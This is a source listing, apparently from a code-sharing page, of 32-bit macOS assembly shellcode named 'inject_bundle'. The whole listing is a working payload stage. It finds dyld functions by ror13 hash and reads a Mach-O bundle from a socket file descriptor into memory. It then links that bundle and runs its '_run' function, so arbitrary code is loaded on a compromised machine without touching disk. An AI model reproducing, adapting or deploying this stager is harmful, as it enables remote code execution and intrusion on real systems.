Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

1
;;;
2
;;; Skip straight to inject_bundle when we assemble this as bin file
3
;;;
4
jmp	_inject_bundle
5

6
;;; --------------------------------------------------------------------
7
;;; Constants
8
;;; --------------------------------------------------------------------
9
%define	MAP_ANON    0x1000
10
%define MAP_PRIVATE 0x0002
11
%define PROT_READ   0x01
12
%define PROT_WRITE  0x02
13

14
%define NSLINKMODULE_OPTION_BINDNOW 0x1
15
%define NSLINKMODULE_OPTION_PRIVATE 0x2
16
%define NSLINKMODULE_OPTION_RETURN_ON_ERROR 0x4
17

18
;;; --------------------------------------------------------------------
19
;;; ror13_hash(string symbol_name)
20
;;;
21
;;; Compute the 32-bit "ror13" hash for a given symbol name.  The hash
22
;;; value is left in the variable hash
23
;;; --------------------------------------------------------------------
24
%macro ror13_hash 1
25
  %assign hash 0
26
  %assign c 0
27
  %strlen len %1
28
 
29
  %assign i 1
30
  %rep len
31
    %substr c %1 i
32
    %assign hash ((((hash >> 13) | (hash << 19)) + c) & 0xFFFFFFFF)
33
    %assign i i + 1
34
  %endrep
35
%endmacro
36

37
;;; --------------------------------------------------------------------
38
;;; dyld_resolve(uint32_t hash)
39
;;;
40
;;; Lookup the address of an exported symbol within dyld by "ror13" hash.
41
;;; 
42
;;; Arguments:
43
;;;     hash - 32-bit "ror13" hash of symbol name
44
;;; --------------------------------------------------------------------
45
_dyld_resolve:
46
	mov	eax, [esp+4]
47
	push	eax
48
	push	0x8fe00000
49
	call	_macho_resolve
50
	ret	4
51

52
;;; --------------------------------------------------------------------
53
;;; macho_resolve(void* base, uint32_t hash)
54
;;;
55
;;; Lookup the address of an exported symbol within the given Mach-O
56
;;; image by "ror13" hash value.
57
;;; 
58
;;; Arguments:
59
;;;     base - base address of Mach-O image
60
;;;     hash - 32-bit "ror13" hash of symbol name
61
;;; --------------------------------------------------------------------
62
_macho_resolve:
63
	push	ebp
64
	mov	ebp, esp
65
	sub	esp, byte 12
66
	push	ebx
67
	push	esi
68
	push	edi
69

70
	mov	ebx, [ebp+8]		; mach-o image base address
71
	mov	eax, [ebx+16]		; mach_header->ncmds
72
	mov	[ebp-4], eax		; ncmds
73
	
74
	add	bl, 28			; Advance ebx to first load command
75
.loadcmd:
76
	;; Load command loop
77
	xor	eax, eax
78
	cmp	dword [ebp-4], eax
79
	je	.return
80

81
	inc	eax
82
	cmp	[ebx], eax
83
	je	.segment
84
	inc	eax
85
	cmp	[ebx], eax
86
	je	.symtab
87
.next_loadcmd:	
88
	;; Advance to the next load command
89
	dec	dword [ebp-4]
90
	add	ebx, [ebx+4]
91
	jmp	.loadcmd
92

93
.segment:
94
	;; Look for "__TEXT" segment
95
	cmp	[ebx+10], dword 'TEXT'
96
	je	.text
97
	;; Look for "__LINKEDIT" segment
98
	cmp	[ebx+10], dword 'LINK'
99
	je	.linkedit
100
	
101
	jmp	.next_loadcmd
102
.text:
103
	mov	eax, [ebx+24]
104
	mov	[ebp-8], eax		; save image preferred load address
105
	jmp	.next_loadcmd
106
.linkedit:
107
	;; We have found the __LINKEDIT segment
108
	mov	eax, [ebx+24]		; segcmd->vmaddr
109
	sub	eax, [ebp-8]		; image preferred load address
110
	add	eax, [ebp+8]		; actual image load address
111
	sub	eax, [ebx+32]		; segcmd->fileoff
112
	mov	[ebp-12], eax		; save linkedit segment base
113

114
	jmp	.next_loadcmd
115

116
.symtab:
117
	;; Examine LC_SYMTAB load command
118
	mov	ecx, [ebx+12]		; ecx = symtab->nsyms
119
.symbol:
120
	xor	eax, eax
121
	cmp	ecx, eax
122
	je	.return
123
	dec	ecx
124
	
125
	imul	edx, ecx, byte 12	; edx = index into symbol table
126
	add	edx, [ebx+8]		; edx += symtab->symoff
127
	add	edx, [ebp-12]		; adjust symoff relative to linkedit
128

129
	mov	esi, [edx]		; esi = index into string table
130
	add	esi, [ebx+16]		; esi += symtab->stroff
131
	add	esi, [ebp-12]		; adjust stroff relative to linkedit
132

133
	;; hash = (hash >> 13) | ((hash & 0x1fff) << 19) + c
134
	xor	edi, edi
135
	cld
136
.hash:
137
	xor	eax, eax
138
	lodsb
139
	cmp	al, ah
140
        je      .compare
141
        ror     edi, 13
142
        add     edi, eax
143
        jmp     .hash
144

145
.compare:
146
	cmp	edi, [ebp+12]
147
	jne	.symbol
148

149
	mov	eax, [edx+8]		; return symbols[ecx].n_value
150
	sub	eax, [ebp-8]		; adjust to actual load address
151
	add	eax, [ebp+8]
152
.return:	
153
	pop	edi
154
	pop	esi
155
	pop	ebx
156
	leave
157
	ret	8
158

159
;;; --------------------------------------------------------------------
160
;;; inject_bundle(int filedes)
161
;;; 
162
;;; Read a Mach-O bundle from the given file descriptor, load and link
163
;;; it into the currently running process.
164
;;; 
165
;;; Arguments:
166
;;;     filedes (edi) - file descriptor to read() bundle from
167
;;; --------------------------------------------------------------------
168
_inject_bundle:
169
	push	ebp
170
	mov	ebp, esp
171
	sub	esp, byte 12
172

173
	mov	esi, edi	; arg0: filedes
174

175
.read_size:
176
	;; Read a 4-byte size of bundle to read
177
	xor	eax, eax
178
	mov	al, 4
179
	push	eax		; nbyte
180
	lea	edi, [ebp-4]
181
	push	edi		; buf
182
	push	esi		; s
183
	push	eax
184
	dec	eax
185
	int	0x80
186
 	jb	.read_error
187
	cmp	eax, ecx	; A zero-read signals termination
188
	je	.read_error
189
	mov	ecx, [ebp-4]
190
	xor	eax, eax
191
	cmp	ecx, eax
192
	je	.read_error	; A zero value signals termination
193

194
	jmp	.mmap
195
.read_error:
196
	jmp	.error
197
	
198
.mmap:
199
	;; mmap memory
200
	xor	eax, eax
201
	push	eax
202
	push	-1
203
	push	(MAP_ANON | MAP_PRIVATE)
204
	push	(PROT_READ | PROT_WRITE)
205
	push	ecx		; size
206
	push	eax
207
	push	eax 		; spacer
208
	mov	al, 197
209
	int	0x80
210
	jb	.error
211
	mov	edi, eax	; memory buffer
212
	mov	[ebp-8], edi
213
	
214
	;; read bundle from file descriptor into mmap'd buffer
215
.read_bundle:
216
	xor	eax, eax
217
	push	ecx		; nbyte
218
	push	edi		; buf
219
	push	esi		; filedes
220
	push	eax		; spacer
221
	mov	al, 3
222
	int	0x80
223
	jb	.error
224
	add	edi, eax
225
	sub	ecx, eax
226
	jnz	.read_bundle
227

228
	mov	edi, [ebp-8]	; load original memory buffer
229

230
	;; Now that we are calling library methods, we need to make sure
231
	;; that esp is 16-byte aligned at the the point of the call
232
	;; instruction.  So we align the stack here and then just be
233
	;; careful to keep it aligned as we call library functions.
234

235
	sub	esp, byte 16
236
	and	esp, 0xfffffff0
237
	
238
	;; load bundle from mmap'd buffer
239
	push	byte 0		; maintain alignment
240
	lea	eax, [ebp-8]
241
	push	eax		; &objectFileImage
242
	push	dword [ebp+12]	; size
243
	push	edi		; addr
244
	ror13_hash "_NSCreateObjectFileImageFromMemory"
245
	push	dword hash
246
	call	_dyld_resolve
247
	call	eax
248
	cmp	al, 1
249
	jne	.error
250

251
	;; link bundle from object file image
252
	xor	eax, eax
253
	push	eax
254
	mov	al, (NSLINKMODULE_OPTION_RETURN_ON_ERROR | NSLINKMODULE_OPTION_BINDNOW)
255
	push	eax
256
	push	esp		; ""
257
	push	dword [ebp-8]
258
	ror13_hash "_NSLinkModule"
259
	push	dword hash
260
	call	_dyld_resolve
261
	call	eax
262

263
	;; run_symbol = NSLookupSymbolInModule(module, "_run")
264
	mov	ebx, eax
265
	xor	eax, eax
266
	push	eax		; "\0\0\0\0"
267
	push	0x6e75725f	; "_run"
268
	mov	eax, esp
269
	push	eax		; sym
270
	push	ebx		; module
271

272
	ror13_hash "_NSLookupSymbolInModule"
273
	push	dword hash
274
	call	_dyld_resolve
275
	call	eax
276

277
	;; NSAddressOfSymbol(run_symbol)
278
	sub	esp, 12		; maintain alignment
279
	push	eax
280
        ror13_hash "_NSAddressOfSymbol"
281
        push    dword hash
282
        call    _dyld_resolve
283
        call    eax
284

285
	;; _run(socket)
286
	sub	esp, 12		; maintain alignment
287
	push	esi
288
	call	eax
289

290
.error:
291
	;; Exit cleanly
292
	xor	eax, eax
293
	push	eax	; EXIT_SUCCESS
294
	push	eax	; spacer
295
	mov	al, 1
296
	int	0x80
297

298